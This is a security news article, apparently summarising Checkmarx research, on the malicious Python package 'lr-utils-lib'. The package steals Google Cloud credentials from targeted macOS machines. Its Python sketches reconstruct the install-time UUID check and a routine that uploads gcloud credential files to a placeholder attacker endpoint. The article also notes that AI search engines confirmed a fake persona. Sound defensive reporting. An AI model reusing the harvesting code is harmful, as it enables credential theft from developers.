Malicious Python Package Attacking macOS Developers To Steal GCP Logins


Threat actors continue to use malicious Python packages to compromise developer environments, injecting harmful code that lets them steal sensitive information, install malware, or create backdoors.

The technique abuses widely used package repositories, giving attackers broad reach with minimal effort.

Cybersecurity researchers at Checkmarx recently identified threat actors actively abusing a malicious package, “lr-utils-lib,” to attack macOS developers and steal Google Cloud logins.

Malicious Python Package

The malicious package, “lr-utils-lib,” has been found to target macOS systems in order to steal Google Cloud Platform credentials.


The package’s setup.py file contains hidden code that runs during installation. It targets macOS specifically, first checking the operating system type and then comparing the device’s IOPlatformUUID against a list of 64 predefined hashes.
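Based on that description, a minimal sketch of how such an install-time targeting check might look is shown below. The hash algorithm, hash list, and function names are assumptions for illustration; the actual lr-utils-lib code is not reproduced here.

```python
# Illustrative sketch only, based on the behavior described above.
# The hash algorithm (SHA-256 here), the hash list, and all names are
# assumptions, not the actual lr-utils-lib code.
import hashlib
import platform
import subprocess

# Placeholder standing in for the attackers' list of 64 precomputed hashes.
TARGET_HASHES = {"<hash-of-targeted-IOPlatformUUID>"}


def get_platform_uuid() -> str:
    """Read the IOPlatformUUID from the macOS I/O Registry via ioreg."""
    output = subprocess.run(
        ["ioreg", "-rd1", "-c", "IOPlatformExpertDevice"],
        capture_output=True, text=True,
    ).stdout
    for line in output.splitlines():
        if "IOPlatformUUID" in line:
            return line.split('"')[-2]
    return ""


def is_targeted_machine() -> bool:
    """Proceed only on macOS hosts whose hashed UUID is on the target list."""
    if platform.system() != "Darwin":  # macOS check
        return False
    digest = hashlib.sha256(get_platform_uuid().encode()).hexdigest()
    return digest in TARGET_HASHES
```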

Once a match is found, the malware attempts to harvest sensitive data from the ~/.config/gcloud/application_default_credentials.json and credentials.db files.

The stolen data is then sent to a remote server (europe-west2-workload-422915.cloudfunctions.net).
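A rough sketch of that harvesting step follows. The file paths come from the report, while the upload format is an assumption and the endpoint is a placeholder rather than the real exfiltration server (the actual domain is listed in the IoCs below).

```python
# Illustrative sketch of the reported credential-harvesting step.
# File paths are from the report; the upload format is an assumption and
# the endpoint below is a placeholder, not the real exfiltration server.
import os
import requests

GCLOUD_DIR = os.path.expanduser("~/.config/gcloud")
TARGET_FILES = ("application_default_credentials.json", "credentials.db")
EXFIL_URL = "https://<attacker-controlled-cloud-function>/"  # placeholder


def harvest_gcloud_credentials() -> None:
    """Upload the gcloud credential files, if present, to the remote server."""
    for name in TARGET_FILES:
        path = os.path.join(GCLOUD_DIR, name)
        if os.path.exists(path):
            with open(path, "rb") as fh:
                requests.post(EXFIL_URL, files={name: fh}, timeout=10)
```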

Attack flow (Source – Checkmarx)

This sophisticated attack has been linked to a fake LinkedIn profile under the name “Lucid Zenith,” which falsely claims to be the CEO of Apex Companies, LLC.

The incident shows how modern cyber threats combine malware distribution, social engineering tactics, and the exploitation of inconsistencies in how AI search engines verify information.

The “lr-utils-lib” attack was accompanied by this complex social engineering component: the fake “Lucid Zenith” account and its false claim to the Apex Companies, LLC CEO role.

Fake LinkedIn profile (Source – Checkmarx)

AI-driven search engines handled this claim inconsistently, with some wrongly confirming the false information.

This shows that threat actors can exploit weaknesses in how AI systems verify information, so it is important to cross-check multiple sources when using AI tools for research.

The “lr-utils-lib” Python package represents a targeted attack on macOS users designed to steal Google Cloud credentials. It underscores the need for careful scrutiny of the security of third-party packages.

The incident also highlights broader cybersecurity problems, such as fake LinkedIn profiles and AI search engines that return conflicting results when asked to verify them.

Software development and information-gathering workflows consequently require rigorous vetting processes, multi-source verification, and critical thinking.

Such attacks may begin by targeting individual developers, but they have far-reaching effects on enterprise security and can lead to data breaches and reputational damage.

IOCs

  • europe-west2-workload-422915[.]cloudfunctions[.]net
  • lucid[.]zeniths[.]0j@icloud[.]com
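As a quick triage step, a developer could check whether the package is present in the local environment and review outbound DNS or proxy logs for the domain above. A minimal sketch, assuming pip is available on PATH, is shown below.

```python
# Minimal triage sketch: checks for the malicious package locally and
# prints the network IoC to hunt for in DNS or proxy logs.
# Assumes pip is available on PATH.
import subprocess

SUSPECT_PACKAGE = "lr-utils-lib"
IOC_DOMAIN = "europe-west2-workload-422915.cloudfunctions.net"


def package_installed(name: str) -> bool:
    """Return True if pip reports the package as installed."""
    result = subprocess.run(
        ["pip", "show", name], capture_output=True, text=True
    )
    return result.returncode == 0


if __name__ == "__main__":
    if package_installed(SUSPECT_PACKAGE):
        print(f"WARNING: {SUSPECT_PACKAGE} is installed - rotate GCP credentials.")
    else:
        print(f"{SUSPECT_PACKAGE} not found in this environment.")
    print(f"Check outbound DNS/proxy logs for: {IOC_DOMAIN}")
```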



